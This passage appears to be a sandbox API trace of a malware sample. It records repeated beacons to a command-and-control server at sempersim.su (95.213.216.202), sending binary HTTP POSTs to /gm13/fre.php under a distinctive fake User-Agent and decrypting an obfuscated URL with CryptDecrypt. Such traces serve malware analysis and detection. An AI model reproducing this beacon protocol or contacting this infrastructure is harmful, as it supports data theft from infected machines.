(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0254.869] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0254.871] GetProcessHeap () returned 0x620000 [0254.871] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0254.871] socket (af=2, type=1, protocol=6) returned 0x3dc [0254.872] connect (s=0x3dc, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0254.926] FreeAddrInfoW (pAddrInfo=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0254.926] GetProcessHeap () returned 0x620000 [0254.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0254.926] GetProcessHeap () returned 0x620000 [0254.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0254.927] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0254.928] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0254.928] GetProcessHeap () returned 0x620000 [0254.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0254.928] GetProcessHeap () returned 0x620000 [0254.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0254.929] GetProcessHeap () returned 0x620000 [0254.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643638 [0254.929] GetProcessHeap () returned 0x620000 [0254.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0254.930] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0254.930] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0254.930] GetProcessHeap () returned 0x620000 [0254.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0254.930] GetProcessHeap () returned 0x620000 [0254.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0254.931] send (s=0x3dc, buf=0x63a880*, len=237, flags=0) returned 237 [0254.932] send (s=0x3dc, buf=0x6421e0*, len=159, flags=0) returned 159 [0254.932] GetProcessHeap () returned 0x620000 [0254.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0254.932] recv (in: s=0x3dc, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0256.657] GetProcessHeap () returned 0x620000 [0256.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0256.658] GetProcessHeap () returned 0x620000 [0256.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0256.658] GetProcessHeap () returned 0x620000 [0256.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0256.658] GetProcessHeap () returned 0x620000 [0256.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0256.659] closesocket (s=0x3dc) returned 0 [0256.659] GetProcessHeap () returned 0x620000 [0256.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0256.659] GetProcessHeap () returned 0x620000 [0256.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645630 | out: hHeap=0x620000) returned 1 [0256.660] GetProcessHeap () returned 0x620000 [0256.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ea0 | out: hHeap=0x620000) returned 1 [0256.660] GetProcessHeap () returned 0x620000 [0256.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0256.661] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x40c) returned 0x3dc [0256.663] Sleep (dwMilliseconds=0xea60) [0256.685] GetProcessHeap () returned 0x620000 [0256.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6433f8 [0256.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.717] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0256.735] GetProcessHeap () returned 0x620000 [0256.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0256.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.735] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0256.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.736] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.737] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.737] GetProcessHeap () returned 0x620000 [0256.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0256.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.738] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6433f8, pdwDataLen=0x19fcfc | out: pbData=0x6433f8, pdwDataLen=0x19fcfc) returned 1 [0256.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.739] CryptDestroyKey (hKey=0x62d710) returned 1 [0256.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.740] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0256.740] GetProcessHeap () returned 0x620000 [0256.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646998 [0256.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.741] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.742] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.743] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.743] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.743] GetProcessHeap () returned 0x620000 [0256.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0256.743] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.744] GetProcessHeap () returned 0x620000 [0256.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0256.744] GetProcessHeap () returned 0x620000 [0256.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646998 | out: hHeap=0x620000) returned 1 [0256.806] GetProcessHeap () returned 0x620000 [0256.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0256.807] GetProcessHeap () returned 0x620000 [0256.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0256.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0256.822] GetProcessHeap () returned 0x620000 [0256.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0256.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.823] CryptImportKey (in: hProv=0x63ba08, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0256.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.825] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.825] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.825] GetProcessHeap () returned 0x620000 [0256.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0256.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.827] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0256.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.828] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0256.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0256.828] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0256.828] GetProcessHeap () returned 0x620000 [0256.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0256.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.829] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0256.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.830] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0256.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0256.831] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0256.831] GetProcessHeap () returned 0x620000 [0256.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0256.831] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0256.832] GetProcessHeap () returned 0x620000 [0256.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0256.833] socket (af=2, type=1, protocol=6) returned 0x3e0 [0256.833] connect (s=0x3e0, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0256.884] FreeAddrInfoW (pAddrInfo=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0256.884] GetProcessHeap () returned 0x620000 [0256.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0256.884] GetProcessHeap () returned 0x620000 [0256.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0256.885] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0256.888] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0256.888] GetProcessHeap () returned 0x620000 [0256.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0256.888] GetProcessHeap () returned 0x620000 [0256.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0256.888] GetProcessHeap () returned 0x620000 [0256.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0256.888] GetProcessHeap () returned 0x620000 [0256.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0256.889] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0256.890] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0256.890] GetProcessHeap () returned 0x620000 [0256.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0256.890] GetProcessHeap () returned 0x620000 [0256.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0256.891] send (s=0x3e0, buf=0x63a880*, len=237, flags=0) returned 237 [0256.892] send (s=0x3e0, buf=0x6421e0*, len=159, flags=0) returned 159 [0256.892] GetProcessHeap () returned 0x620000 [0256.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0256.892] recv (in: s=0x3e0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0258.325] GetProcessHeap () returned 0x620000 [0258.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0258.326] GetProcessHeap () returned 0x620000 [0258.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0258.326] GetProcessHeap () returned 0x620000 [0258.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0258.326] GetProcessHeap () returned 0x620000 [0258.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0258.327] closesocket (s=0x3e0) returned 0 [0258.327] GetProcessHeap () returned 0x620000 [0258.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0258.327] GetProcessHeap () returned 0x620000 [0258.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0258.327] GetProcessHeap () returned 0x620000 [0258.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0258.328] GetProcessHeap () returned 0x620000 [0258.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0258.328] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc04) returned 0x3e0 [0258.330] Sleep (dwMilliseconds=0xea60) [0258.346] GetProcessHeap () returned 0x620000 [0258.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0258.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0258.360] GetProcessHeap () returned 0x620000 [0258.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0258.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.383] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0258.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.384] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.385] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.385] GetProcessHeap () returned 0x620000 [0258.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0258.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.443] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0258.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.444] CryptDestroyKey (hKey=0x62d710) returned 1 [0258.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.445] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0258.445] GetProcessHeap () returned 0x620000 [0258.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0258.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.446] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.447] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.512] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.513] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.513] GetProcessHeap () returned 0x620000 [0258.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0258.513] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.513] GetProcessHeap () returned 0x620000 [0258.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0258.514] GetProcessHeap () returned 0x620000 [0258.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0258.514] GetProcessHeap () returned 0x620000 [0258.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0258.514] GetProcessHeap () returned 0x620000 [0258.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0258.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0258.534] GetProcessHeap () returned 0x620000 [0258.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0258.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.535] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0258.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.536] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.537] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.537] GetProcessHeap () returned 0x620000 [0258.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0258.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.538] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0258.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.539] CryptDestroyKey (hKey=0x62d710) returned 1 [0258.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0258.540] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0258.540] GetProcessHeap () returned 0x620000 [0258.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6451e0 [0258.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.541] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0258.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.542] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0258.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0258.545] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0258.545] GetProcessHeap () returned 0x620000 [0258.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0258.545] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0258.547] GetProcessHeap () returned 0x620000 [0258.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5f0 [0258.547] socket (af=2, type=1, protocol=6) returned 0x3e4 [0258.547] connect (s=0x3e4, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0258.598] FreeAddrInfoW (pAddrInfo=0x63c4d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0258.598] GetProcessHeap () returned 0x620000 [0258.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0258.598] GetProcessHeap () returned 0x620000 [0258.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0258.599] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0258.600] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: 